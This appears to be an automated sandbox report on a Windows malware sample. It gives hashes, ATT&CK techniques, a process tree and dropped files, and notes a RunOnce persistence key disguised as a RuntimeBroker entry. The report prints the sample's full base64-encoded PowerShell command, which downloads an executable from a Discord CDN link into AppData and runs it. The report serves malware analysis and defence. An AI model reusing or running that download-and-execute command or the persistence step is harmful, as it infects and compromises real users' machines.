43f8501bcf8e196eeb57688b6dc5e12e431aee46ec86aa8643c50d91e952dfea

General

Target

43f8501bcf8e196eeb57688b6dc5e12e431aee46ec86aa8643c50d91e952dfea.exe
Size

5KB
MD5

a43d70277fe90ecd3bc2da18108978f5
SHA1

a2104dd195d70b13f9c37977160df46045399848
SHA256

43f8501bcf8e196eeb57688b6dc5e12e431aee46ec86aa8643c50d91e952dfea
SHA512

3cd4da9c5b4c3de55b4bab1bfd2f41877eb5ed8263e98bc82533cb894a91acbb5d3b8fa94aa56d2ca4f6f44c8f595bae791bf8f3de458536c5afe4d63fd3ba54
SSDEEP

96:mkFv579WaL1bhycGzwcxNI0s7GztFNtUqHpVH7Y3d3ojerl:JvJ9WaL1bhycENI0SiHNtUqHLk3d3

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
38	4924	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
2992	10.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	43f8501bcf8e196eeb57688b6dc5e12e431aee46ec86aa8643c50d91e952dfea.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	10.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4924	powershell.exe
4924	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	2992	10.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 3108 wrote to memory of 4924	3108	43f8501bcf8e196eeb57688b6dc5e12e431aee46ec86aa8643c50d91e952dfea.exe	81
PID 3108 wrote to memory of 4924	3108	43f8501bcf8e196eeb57688b6dc5e12e431aee46ec86aa8643c50d91e952dfea.exe	81
PID 4924 wrote to memory of 2992	4924	powershell.exe	90
PID 4924 wrote to memory of 2992	4924	powershell.exe	90
PID 4924 wrote to memory of 2992	4924	powershell.exe	90

C:\Users\Admin\AppData\Local\Temp\43f8501bcf8e196eeb57688b6dc5e12e431aee46ec86aa8643c50d91e952dfea.exe
"C:\Users\Admin\AppData\Local\Temp\43f8501bcf8e196eeb57688b6dc5e12e431aee46ec86aa8643c50d91e952dfea.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAegB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADMANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADYANgA1ADMAMQA2ADQAMAA4ADgAMQAzADkAOAAxADcALwAxADAANQA2ADYANQA0ADAAMQA0ADAAOQA3ADQAMAA0ADAAMAA0AC8ATgBDAE4AWABKADIALgBlAHgAZQAnACwAIAA8ACMAbABmAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AHYAdAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAHgAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAKQA8ACMAbgB2AHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABwAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAbABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMAAuAGUAeABlACcAKQA8ACMAYwB1AGQAIwA+AA=="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Users\Admin\AppData\Roaming\10.exe
    "C:\Users\Admin\AppData\Roaming\10.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:2992

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\10.exe

Filesize
4.0MB

MD5
1b95646f069d9414608be6d31fca0c1e

SHA1
1cc8efdcbb3f3bc290f99d73af1c065dcc3de4f9

SHA256
76fa10af6bec8b083f5f9339e16509ad0796e97776266317baa84c4129d6f4a4

SHA512
f899b1b7f135614bce8bfbe12fb663ecf761510c91ef7093b6f22374e2a533559ae2fd61555e632e7658bb39525837c613f41a83bb3d4326ea59b9e30e164def

Download Submit
C:\Users\Admin\AppData\Roaming\10.exe

Filesize
4.0MB

MD5
1b95646f069d9414608be6d31fca0c1e

SHA1
1cc8efdcbb3f3bc290f99d73af1c065dcc3de4f9

SHA256
76fa10af6bec8b083f5f9339e16509ad0796e97776266317baa84c4129d6f4a4

SHA512
f899b1b7f135614bce8bfbe12fb663ecf761510c91ef7093b6f22374e2a533559ae2fd61555e632e7658bb39525837c613f41a83bb3d4326ea59b9e30e164def

Download Submit
memory/2992-142-0x0000000000F00000-0x00000000012FA000-memory.dmp

Filesize
4.0MB

Download
memory/2992-145-0x0000000006270000-0x00000000062D6000-memory.dmp

Filesize
408KB

Download
memory/2992-144-0x0000000006320000-0x00000000068C4000-memory.dmp

Filesize
5.6MB

Download
memory/2992-143-0x0000000005CD0000-0x0000000005D6C000-memory.dmp

Filesize
624KB

Download
memory/2992-138-0x0000000000000000-mapping.dmp

Download
memory/3108-134-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

Filesize
10.8MB

Download
memory/3108-132-0x0000000000510000-0x0000000000518000-memory.dmp

Filesize
32KB

Download
memory/4924-135-0x00000284EDD80000-0x00000284EDDA2000-memory.dmp

Filesize
136KB

Download
memory/4924-141-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

Filesize
10.8MB

Download
memory/4924-137-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

Filesize
10.8MB

Download
memory/4924-136-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

Filesize
10.8MB

Download
memory/4924-133-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing